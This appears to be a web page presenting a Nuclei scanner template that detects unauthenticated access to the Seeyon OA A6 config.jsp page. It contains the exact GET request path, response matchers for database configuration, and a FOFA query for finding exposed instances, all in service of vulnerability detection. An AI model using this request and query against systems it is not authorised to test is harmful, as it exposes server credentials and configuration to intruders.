Skip to content

Seeyon OA A6 config.jsp - Information Disclosure

ID: seeyon-config-exposure

Severity: medium

Author: SleepingBag945

Tags: seeyon,oa,config,info-leak

The Seeyon OA A6 config.jsp page can be accessed without authorization, resulting in sensitive information leakage vulnerabilities, through which attackers can obtain sensitive information in the server

id: seeyon-config-exposure
info:
name: Seeyon OA A6 config.jsp - Information Disclosure
author: SleepingBag945
severity: medium
description: |
The Seeyon OA A6 config.jsp page can be accessed without authorization, resulting in sensitive information leakage vulnerabilities, through which attackers can obtain sensitive information in the server
reference:
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20A6%20config.jsp%20%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
metadata:
verified: true
max-request: 1
fofa-query: body="yyoa" && app="致远互联-OA"
tags: seeyon,oa,config,info-leak
http:
- raw:
- |
GET /yyoa/ext/trafaxserver/SystemManage/config.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "DatabaseName="
- "请在文本框内配置传真插件所需服务器的信息"
condition: and
- type: status
status:
- 200
# digest: 490a0046304402202c4a568e09848fbb8adc6702f1e837bb8557b1b820413d97d2b2d19a593a1cf30220213e65e7a1699accbf3acf7bc41928aa30ac0a2c177e2e9dc68e618e164b47c0:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/seeyon/seeyon-config-exposure.yaml"

View on Github